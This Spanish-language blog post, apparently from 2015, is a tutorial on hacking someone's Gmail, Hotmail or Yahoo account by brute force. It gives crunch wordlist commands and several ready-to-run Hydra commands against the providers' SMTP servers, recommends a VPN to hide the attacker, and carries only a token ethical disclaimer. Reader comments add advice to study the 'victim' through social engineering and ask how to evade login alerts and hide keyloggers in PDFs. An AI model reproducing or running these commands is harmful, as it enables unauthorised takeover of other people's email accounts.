Cómo hackear una cuenta de GMAIL con Fuerza Bruta en Kali Linux 2.0

Últimamente la gente anda desesperada porque hacer estos tipos de métodos y he decidido en mostrar un pequeño metodo donde podrás acceder a una cuenta de “GMAIL”.
Y este tutorial se hace con el fin ético, no deseo mas mensajes como esto, gracias.

Primer paso:
Conseguir o hacer un buen diccionario.
se van a la terminal y crean uno con “CRUNCH”

Screenshot from 2015-10-30 21:39:33

Te dare un ejemplo:
crunch 5 9 abcdefghijklmnopkrstuvwxyz -o /root/Desktop/pass.lst

Luego seguimos en nuestra terminal.

Segundo Paso:
La herramienta se llama “Hydra”

Screenshot from 2015-10-30 21:42:45

Este método es un poco antiguo entonces las personas que tengan su cuenta bien configurada y protegida le saltara una alerta.

Screenshot from 2015-10-30 21:31:36

Les recomiendo que usen VPN

Te dare un Ejemplo:

hydra -S -l email@gmail.com -P /root/Desktop/ArchivoDiccionario -v -V -e ns -s 465 smtp.gmail.com smtp

Desde aquí viene la actualización  de este post.

Hoy me he levantado con una resaca pero aqui me tienen actualizando mi post. Vale usaremos la misma herramienta “HYDRA”

Se preguntarán que es HYDRA?

Hydra es una  entrada paralelizado que soporta numerosos protocolos para atacar.  Es muy rápido y flexible, y los nuevos módulos son fáciles de agregar. Esta herramienta permite a los investigadores y consultores de seguridad para mostrar lo fácil que sería la de obtener acceso no autorizado a un sistema remoto. Es compatible con: Cisco AAA, Cisco auth, Cisco enable, CVS, FTP, HTTP(S)-FORM-GET, HTTP(S)-FORM-POST, HTTP(S)-GET, HTTP(S)-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle Listener, Oracle SID, PC-Anywhere, PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rsh, SIP, SMB(NT), SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.
Info about mail accounts
gmail
server: smtp.gmail.com
port: 465
hotmail
server: smtp.live.com
port: 587
yahoo
server: smtp.mail.yahoo.com
port:587
Después de terminar de leer la teoría básica sobre HYDRA.
He estado jugando con mis cuentas de GMAIL y aunque sacará la contraseña me lanza alerta de intruso conectado pero ese es otro tema. En este caso haremos una fuerza bruta para solo obtener la contraseña.
Screenshot from 2015-12-25 13:05:59
Ahora me preguntarán CREAD cual seria  ese comando?
Bueno he estado investigando alguna data sobre SMTP porque en otro países cambiar. Te doy un ejemplo “RUSIA”
smt.mail.ru pero fijate que no es de GMAIL.
Ahora lo que investigue esta aqui….. y por aqui

Se basa de comandos y opciones HYDRA.

 hydra -S -l test@gmail.com -P (DICCIONARIO) -v -V -e ns -s 465 smtp.gmail.com smtp

Ahora el comando que uso es

 hydra -s 465 -S -v -V -l test@gmail.com -P (DICCIONARIO) -t 1 -w 32 stmp.gmail.com smtp

Te recomiendo que no lo copies y peges y lo escribas en tu terminal.

Screenshot from 2015-12-25 13:11:09
Para más comandos y opciones son los siguiente.

 hydra -x -h

Puedes atacar con carácter especifico que nos ofrece hydra como si tuvieras un diccionario.
“8:10:a1”

 hydra -s 465 -s -v -V -l correo -x 8:10:a1 -t 1 -w 32 smtp.gmail.com smtp

Para redes lean en su soporte para que sea compatible.

 hydra -l admin -P 'DICIONARIO' http://192.168.1.1 -s PUERTO ejemplo 1080

Para HOTMAIL

 hydra -s 587 -s -v -V -l creadpag548@hotmail.com -P '/root/Desktop/cread.txt' -t 1 -w 32 smtp.live.com smtp

PARA YAHOO Lo mismo solo cambias su SMTP y su puerto
Espero haberte ayudado porque es una mega herramienta que solo tienes que jugar y jugar con ella.
Si te gusto ayudame a compartirlo.

13 pensamientos en “Cómo hackear una cuenta de GMAIL con Fuerza Bruta en Kali Linux 2.0

  1. Pingback: Las diez mejores herramientas de hackers de 2015 | CreadPag

  2. Para un correo especifico, un diccionario especifico echo para ese correo, por supuesto si conocen a la victima del correo. de otra forma olvídense de encontrar un diccionario con todas las parabas posibles. Seria gigas y gigas de diccionarios inútiles.. Piensen hagan algo de ingeniería social..estudien a su victima..

    Me gusta

  3. Gran explicación!!!!

    Se puede saltar las alertas de Google, para que no envie esas alertas de que alguien esta tratando de acceder.

    Sabes cuantos intentos por segundo puedo hacer sin que alerten?

    Conoces algun metodo 0day para camuflar un backdoor, keylogger u otro en un pdf, o algun metodo bueno para mediante un adjunto poder vulnerar el S.O sin deteccion del Antivirus?

    Gracias, y realmente son muy muy buenos tus tutos

    Me gusta

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s